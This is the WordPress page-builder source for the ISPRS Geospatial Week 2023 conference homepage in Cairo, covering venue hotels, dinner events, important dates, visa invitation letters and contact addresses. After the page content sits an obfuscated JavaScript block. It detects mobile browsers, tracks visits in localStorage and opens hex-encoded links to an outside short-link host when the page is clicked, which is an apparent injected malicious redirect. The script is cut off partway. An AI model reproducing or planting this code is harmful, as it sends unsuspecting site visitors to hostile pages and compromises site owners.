2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\r\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\r\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][vc_column_text][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<ul>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_column_text][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n<p>[/ultimate_heading][/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return 